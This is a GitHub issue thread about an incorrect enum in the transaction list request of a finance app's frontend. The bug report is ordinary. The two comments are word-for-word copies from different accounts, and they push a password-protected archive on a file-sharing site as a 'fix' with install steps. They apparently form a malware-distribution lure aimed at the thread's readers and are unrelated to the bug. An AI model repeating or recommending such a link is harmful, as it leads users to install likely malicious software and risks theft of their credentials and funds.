### ISSUE TITLE
Fix: Incorrect Enum in Transaction List Request Parameters

### ISSUE THREAD

**Issue by harold-awaken** [Awaken-Finance/awaken-frontend#157]
### Description
There is an issue with the transaction list request parameters where an incorrect enum is being used. This bug affects the accuracy of transaction listings.

### Steps To Reproduce
1. Log in to the application.
2. Navigate to the transaction list section.
3. Send a request to retrieve the transaction list.
4. Observe the incorrect enum in the request parameters.
5. The transaction list returned does not reflect the expected results.

### Current Behavior
- The transaction list request contains an incorrect enum value.
- This leads to incorrect or unexpected transaction data being retrieved.
- Users may see transactions that do not match their expectations.

### Expected Behavior
- The transaction list request should contain the correct enum value.
- The correct transaction data should be retrieved based on the user's request.
- This ensures that users see accurate transaction data.

### Environment
- Platform: PC
- Node: v18.18.0
- Browser: Chrome 126.0.6478.56

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
